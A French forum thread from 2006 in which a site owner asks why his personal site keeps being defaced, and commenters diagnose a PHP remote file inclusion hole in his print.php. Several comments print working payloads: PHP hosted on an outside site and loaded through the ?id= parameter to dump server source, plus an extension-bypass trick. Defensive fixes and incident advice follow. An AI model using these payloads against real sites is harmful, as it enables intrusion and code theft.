cher petit journal, je suis victime d'un hacker qui me tourmente, sauras-tu me trouver une solution et une explication sur cet étrange phénomène ?
Ainsi donc, j'ai eu il y a quelques jours la page d'accueil de mon site "hackée" avec la mention "hacked by Crack_man", j'ai donc modifié le mot de passe en le choisissant plus complexe (pas de mots du dictionnaire + des chiffres), et ai restauré la page d'accueil. Mais ce soir j'ai vu que le site avait été de nouveau hacké, par le même, je ne vois vraiment pas comment cela peut être arrivé, d'autant plus que cela ne peut pas être un trojan ou autre virus (je suis sous linux), je n'ai apparemment pas de rootkit d'installé sur ma machine, n'ai pas d'ip fixe etc, en plus le "hack" semble vraiment amateur (cela ne veut rien dire car cela peut être un leurre, mais la page de garde a été faite apparemment avec frontpage -- vengeance de jvachez ? --)
si cela peut vous amuser d'aller voir : http://anamnese.online.fr (en attendant que je rétablisse le truc, si je peux...)
Des idées sur ce qui aurait pu se passer ?
Journal site perso hacké à plusieurs reprises
9
août
2006
# s/hacker/script kiddy/
Posté par BAud (site web personnel) . Évalué à 7.
Je ne suis pas trop pour avoir mis les black-hats dans http://fr.wikipedia.org/wiki/Hacker pour moi ce sont des crackers http://fr.wikipedia.org/wiki/Cracker_%28d%C3%A9plombeur_de_l(...) (no non déplombeur de logiciels ça ne me va pas non plus :/)
bon et t'as quoi comme CMS en temps normal ?
[^] # Re: s/hacker/script kiddy/
Posté par BAud (site web personnel) . Évalué à 6.
le mieux est de regarder dans tes logs pour voir les requêtes bizarres qui seraient passées...
[^] # Re: s/hacker/script kiddy/
Posté par B16F4RV4RD1N . Évalué à 4.
http://anamnese.online.fr/wikini/wakka.php "Pour des raisons indépendantes de notre volonté, le contenu de ce Wiki est temporairement inaccessible. Veuillez réessayer ultérieurement, merci de votre compréhension."
donc soit le cracker peut charger ses fichiers sans connaitre mes mots de passe (ce qui me rassure un peu), soit il a pu récupérer mes mots de passe via une faille dans un des modules php+mysql qui dormaient là.
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
[^] # Re: s/hacker/script kiddy/
Posté par BAud (site web personnel) . Évalué à 5.
Tu peux essayer de renommer tous tes répertoires à la racine de ton site pour isoler le problème. Si une page html statique se fait de nouveau cracker, c'est que le script kiddy utilise une vulnérabilité du serveur et non de ton site web :/
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 10.
Apparament on peut executer n'importe quoi sur ton serveur :
http://anamnese.online.fr/site2/print.php?id=http://serveurd(...)
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 10.
(le plus long était de creer un compte sur voila...)
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 6.
Si tu as besoin d'aide, je veux bien essayer de t'aider meme si je n'ai pas vraiment touché au php depuis la seconde.
N'hesite pas à me contacter sur Jabber : maxime AT im.apinc.org ou par mail maxime81@gmail.com
[^] # Re: s/hacker/script kiddy/
Posté par Olivier Esver (site web personnel) . Évalué à 7.
dans ton print.php elle se situe la :
<? if ($_GET['page'] != "" ) { include("page$page.php"); } else { include("$id.php"); } ?>
On peux donc inclure ce qu'on veux.
Si tu n'inclue que des fichiers locaux une petite correction serai de faire :
<? if ($_GET['page'] != "" ) { include("./page$page.php"); } else { include("./$id.php"); } ?>
Comme ca ca forcerai le script a ne lire que des fichiers locaux. En attandant de trouver mieux car mon niveau de php n'est pas très élevé
S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.
[^] # Re: s/hacker/script kiddy/
Posté par Corentin Chary (site web personnel) . Évalué à 4.
http://www.phpsecure.info/v2/article/php-security.php
[^] # Re: s/hacker/script kiddy/
Posté par B16F4RV4RD1N . Évalué à 2.
Il faut que je modifie ce script en conséquence, en attendant je l'ai désactivé.
Mais comment as-tu fait pour pouvoir visualiser le code en php ??
Je croyais que le php était forcément exécuté par le serveur et que l'on ne pouvait pas le visionner. Cela veut dire que si là-dedans il y avait un code avec accès à une base tu pourrais tout lire ?
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
[^] # Re: s/hacker/script kiddy/
Posté par zyphos . Évalué à 6.
1. tu héverges ce contenu dans un fichier, par exemple, http://monsite/show.txt
contenant ceci:
<?php
echo htmlentities(implode('',file('print.php'));
?php>
puis dans un navigateur tu mets, http://anamnese.online.fr/site2/print.php?id=http://monsite/(...)
Et là t'as,le fichier qui s'affiche en clair.
[^] # Re: s/hacker/script kiddy/
Posté par zyphos . Évalué à 4.
<?php
echo htmlentities(implode('',file('print.php')));
?>
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 2.
C'est pour ca d'ailleur que je me suis inscrit chez voila qui n'execute pas le php et qui me permet de laisser l'extention .php à mon fichier.
[^] # Re: s/hacker/script kiddy/
Posté par Gof (site web personnel) . Évalué à 3.
et pour un site qui aurait fait include ( "$page .php" );
eh bien tu commence sur ta page malicieuse par
<?php echo "<?php"; ?>
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 2.
qui inclue donc la fin du nom de fichier.
Ensuite j'ai pas compris l'interet de commencer la page par <?php echo "<?php"; ?>
[^] # Re: s/hacker/script kiddy/
Posté par Gof (site web personnel) . Évalué à 3.
Soit le fichier PHP suivant:
---------- http://monsite.com/script.php --------------
<?php echo "<?php"; ?>
echo htmlentities(implode('',file('print.php')));
?>
---------------------------------------------------------------
Eh bien quand tu fera
http://victime.com/print.php?id=http://monsite.com/script
le echo "<?php"; sera interprété sur monsite.com
et le htmlentities sera interprété sur victime.com
Tu comprends mieux ? Enfin moi ça me parait logique.
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 2.
[^] # Re: s/hacker/script kiddy/
Posté par phenix (site web personnel) . Évalué à 1.
allow_url_fopen = Off
Si j'ai bien compris a rend inactive ce fameux problème ? Je me trompe ?
[^] # Re: s/hacker/script kiddy/
Posté par Maxime (site web personnel) . Évalué à 2.
Je me trompe ?
[^] # Re: s/hacker/script kiddy/
Posté par inico (site web personnel) . Évalué à 3.
Mais c'est rare.
[^] # Re: s/hacker/script kiddy/
Posté par Olivier Esver (site web personnel) . Évalué à 5.
<?php
$fp=fopen("./print.php","r");
while (!feof($fp))
{
$tmp=fgets($fp,4096);
$tmp=str_replace("<","<",$tmp);
echo "$tmp";
}
fclose($fp);
?>
et je l'ai lancé comme dit précédemment avec l'ip de mon pc et le nom du script sans .php comme ca il a été executé dans ton fichier print.php
Donc j'ai utilisé ta faille pour te l'exposer :)
S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.
# Sympa le code source
Posté par Maillequeule . Évalué à 3.
hacked
Pas très l33t tout ça ... ;)
M
[^] # Re: Sympa le code source
Posté par Maillequeule . Évalué à 10.
Je disais donc ...
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>hacked</title>
# Rah lala...
Posté par pasBill pasGates . Évalué à 10.
Moi je te propose le a-b-c de la securite, en commencant par a :
a) Ne jamais presupposer quoi que ce soit
Typiquement, dans le cas present, ta supposition est fausse
b) Jeter un oeil a tout ce qui est logs(en esperant que le gars est pas assez fute pour les avoir modifie) et essayer de trouver par exemple dans les logs Apache une suite d'attaques n'ayant pas fonctionne, jusqu'a celle qui a fonctionne, dans syslog qui s'est logge et a quel heure,...
c) Faire une liste des softs dispos de l'exterieur(blog php, apache, ssh, ...) et zieuter si il y a pas une difference entre la version que t'as et la derniere version patchee
d) Au pire et si t'as du temps a perdre, transformes ta machine en un mini honeynet(sauve tes donnees avant), change ta page ton mot de passe comme si de rien n'etait, et attends que ca recommence.
e) Il t'es fortement conseille de reinstaller la machine si possible, avoir l'impression qu'il n'y a pas de rootkit ou autre backdoor est une chose, en etre sur en est une autre
[^] # Re: Rah lala...
Posté par B16F4RV4RD1N . Évalué à 3.
Pour les rootkit, c'est vrai que si mon ordinateur servait les fichiers sur internet, ce n'est pas en utilisant chkrootkit que l'on pourrait être certain à 100% de ne pas être compromis, mais c'est déjà une indication (en le lançant si on trouve quelque chose on peut être sûr que la machine est compromise). Mais le risque est quand même faible (cf. plus haut, pas de connection directe sur l'extérieur)
Les crackers n'ont pas toujours le temps ou les capacités de faire une compromission dans les règles de l'art, qui ne laissent pas de traces ni rien. Par exemple une fois j'en avait vu qui s'étaient infiltrés sur une machine et qui avaient eu juste le temps de wget une archive bourrée de scripts pour scanner d'autres machines, leur but étant sans doute de se constituer une armée de machines zombies qui ne sont pas bien surveillées pour opérer tranquillement.
Quoi qu'il en soit, je pencherais plutôt, comme vu plus haut, à une faille dans les modules php+mysql que j'avais négligés de retirer sur mon site, sans doute pour wikini, puisque le reste n'utilise pas de base. Ou alors à une faille dans mes inclusions php qui permettraient de charger des fichiers sur le serveur sans utiliser de mot de passe ?
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
[^] # Re: Rah lala...
Posté par Jean-Luc Henry . Évalué à 4.
S'il est hébergé par free.fr, comment peut-il avoir une adresse ip dynamique?
S'il a une adresse ip dynamique, cela signifie que c'est un hébergement perso donc tu peux avoir accès facilement aux logs apache...
Merci d'éclairer notre lanterne :)
[^] # Re: Rah lala...
Posté par B16F4RV4RD1N . Évalué à 4.
l'hébergement du site = ip fixe, mais je ne sais même pas si on peut accéder au site par l'ip (par exemple la résolution donne l'adresse 212.27.63.124 mais on ne peut le visualiser via cette adresse )
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
[^] # Re: Rah lala...
Posté par kowalsky . Évalué à 2.
Peut etre du virtual hosting...?
[^] # Re: Rah lala...
Posté par Matthieu Moy (site web personnel) . Évalué à 7.
[^] # Re: Rah lala...
Posté par pasBill pasGates . Évalué à 9.
Je te l'ai dit, pas de suppositions...
http://sourceforge.net/projects/lkl/
Ca m'a pris exactement 10 secondes a trouver avec Google, je t'expliques pas ce que je trouverais en cherchant 5 minutes...
En plus je n'ai pas d'ip fixe, et l'ordinateur est derrière une passerelle (impossible de faire ssh dessus).
Ah mais qui te dit que la faille est venue a toi ? Si ca se trouve tu browsais le web avec Firefox, tu t'es fais avoir par une faille la-dedans et l'exploit a installe un keylogger, un lance un shell qui s'est connecte depuis ta machine sur un channel IRC d'ou il a pris des instructions pour envoyer ton mot de passe sur un e-mail, ...
T'as pas idee du genre de trucs que ces gens la font, il y a les script kiddies, et il y a aussi les gros reseaux ayant de temps en temps des liens avec le crime organise(et oui, ces trucs la ca peut payer bcp d'argent...) et des gens tres tres competents.
Les crackers n'ont pas toujours le temps ou les capacités de faire une compromission dans les règles de l'art, qui ne laissent pas de traces ni rien
Pas toujours, tu sais si dans ton cas il a eu le temps ? Non tu sais pas, donc tu assumes le pire, pas le meilleur, sinon t'es parti pour te faire entuber a chaque fois.
Quoi qu'il en soit, je pencherais plutôt, comme vu plus haut, à une faille dans les modules php+mysql que j'avais négligés de retirer sur mon site, sans doute pour wikini, puisque le reste n'utilise pas de base. Ou alors à une faille dans mes inclusions php qui permettraient de charger des fichiers sur le serveur sans utiliser de mot de passe ?
Il y a des chances, et il y a aussi des chances qu'il ait laisse de quoi revenir, auquel cas patcher la machine ne changera rien au probleme...
Le honeynet a l'avantage que tu sauras ce qui s'est passe et ce que le gars a fait(si ca t'interesse), formatter a l'avantage que tu es 100% sur que plus rien de nocif est present sur ta machine.
[^] # Re: Rah lala...
Posté par ColonelMoutarde . Évalué à -1.
* Soit il s'est fait piquer le mdp (piratage de sa machine nulix, écoute sur le résal (vive le ftp avec ses mdp en clair)
* Soit il faudrait qu'il apprenne à programmer en PHP sans créer une faille de sécu toutes les 3 lignes, ou qu'il fasse attention à suivre les failles des packets qu'il utilise pour mettre en jour en cas de besoin.
* Sinon c'est la cabale
[^] # Re: Rah lala...
Posté par Nicolas (site web personnel) . Évalué à -7.
Perds encore 5 minutes, histoire de voir.
> Ah mais qui te dit que la faille est venue a toi ? Si ca se trouve tu browsais le web avec Firefox, tu t'es fais avoir par une faille la-dedans et l'exploit a installe un keylogger, un lance un shell qui s'est connecte depuis ta machine sur un channel IRC d'ou il a pris des instructions pour envoyer ton mot de passe sur un e-mail, ...
Ah le maleureux si seulement il utilisait Internet Explorer il n'aurait pas ce genre de soucis.
> T'as pas idee du genre de trucs que ces gens la font, il y a les script kiddies, et il y a aussi les gros reseaux ayant de temps en temps des liens avec le crime organise(et oui, ces trucs la ca peut payer bcp d'argent...) et des gens tres tres competents.
Mais ça fait vraiment peur tout ça. Tu arrives quand même à dormir ?
Il faut arréter de se croire persécuter et attaquer de partout.
# site perso hacké à plusieurs reprises
Posté par clearstream . Évalué à 10.
Tu voulais dire cracké et non hacké.
[^] # Re: site perso hacké à plusieurs reprises
Posté par B16F4RV4RD1N . Évalué à 2.
Mais c'est vrai que cela n'est pas sympa pour les vrais hackers (cf http://fr.wikipedia.org/wiki/Hacker où on lit que cracker est bien dans le sens que tu donnes)
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
# petite conclusion
Posté par B16F4RV4RD1N . Évalué à 6.
http://www.supinfo-projects.com/fr/2005/faille%5Finclude%5Fp(...)
ansi qu'à la personne qui a gentiment remplacé le site cracké par "site en maintenance" :)
En fait j'étais au courant de ces problèmes d'include, expliqués sur le site du zéro où j'ai eu mes premières bases de php ( http://www.siteduzero.com/index.php ). J'avais sécurisé une partie des scripts comme indiqué sur le site du zéro. Pour la partie du print.php, je pense que j'avais dû essayer de le faire correctement, et puis comme cela avait dû me bloquer quelque part, j'ai lâché du lest et retiré les sécurités nécessaire.
Je ne cherche pas à me justifier, justement ce que j'ai fait était bien idiot. Mais là où je tombe des nues c'est que je pensais qu'une telle faille pouvait proser problème s'il y avait une base sql seulement, je ne pouvais pas imaginer que cela permettait de faire tout cela sur le site, y compris de visualiser les codes php.
Voilà, je me suis bien fait prendre et c'est moi le zéro... :)
Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it
[^] # Re: petite conclusion
Posté par kowalsky . Évalué à 4.
ou quelque chose comme ça... :)
[^] # Re: petite conclusion
Posté par ColonelMoutarde . Évalué à 0.
--->[ ]
A ce propos, vous êtes au courant que je vends ma maison à Dijon http://www.i2bp.com/maison ?
/o\ pub perso, saimal
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.